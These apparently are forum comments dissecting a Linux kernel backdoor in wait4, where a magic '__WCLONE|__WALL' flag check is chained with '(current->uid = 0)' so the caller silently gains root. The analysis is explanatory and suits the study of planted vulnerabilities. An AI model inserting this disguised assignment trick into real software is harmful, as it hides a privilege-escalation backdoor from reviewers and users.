someone should have tested it with the __WCLONE option at least once to see if it returned -EINVAL
if ((options == (__WCLONE|__WALL))
Whether this itself makes sense (i.e. to only take the conditional if both
flags are set) or it this would tend to be something with some more
devious intent - I don’t have enough knowledge to say.
an interesting secondary check would be to look for any code out there that would make the call with both of those options set. see if something was checked in somewhere... and maybe follow from there
C short-circuit evaluates conditionals. That means, if the first term of an ANDed pair of terms is false, the second term is never evaluated.
So, in this case, the term (options == (__WCLONE|__WALL) is acting as an "open sesame" incantation. You have to know about it in order to open the backdoor. Unless the options check evaluates to true, the (current->uid = 0) is simply skipped. If the options check does evaluate true, then the uid gets set to zero (root), and the number zero is evaluated as a boolean, resulting in a value of false. Thus, in neither case does retval = -EINAL; take place.